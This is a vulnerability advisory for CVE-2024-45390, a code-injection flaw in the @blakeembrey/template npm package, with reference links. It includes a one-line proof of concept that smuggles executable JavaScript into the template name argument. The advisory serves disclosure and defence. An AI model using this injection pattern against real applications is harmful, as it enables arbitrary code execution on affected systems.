CVE-2024-45390: @blakeembrey/template vulnerable to code injection when attacker controls template input

September 3, 2024 (updated November 18, 2024)

It is possible to inject and run code within the template if the attacker has access to write the template name.

const { template } = require('@blakeembrey/template');

template("Hello {{name}}!", "exploit() {} && ((()=>{ console.log('success'); })()) && function pwned");

References

github.com/advisories/GHSA-q765-wm9j-66qj
github.com/blakeembrey/js-template
github.com/blakeembrey/js-template/commit/b8d9aa999e464816c6cfb14acd1ad0f5d1e335aa
github.com/blakeembrey/js-template/security/advisories/GHSA-q765-wm9j-66qj
nvd.nist.gov/vuln/detail/CVE-2024-45390

Detect and mitigate CVE-2024-45390 with GitLab Dependency Scanning

Secure your software supply chain by verifying that all open source dependencies used in your projects contain no disclosed vulnerabilities. Learn more about Dependency Scanning →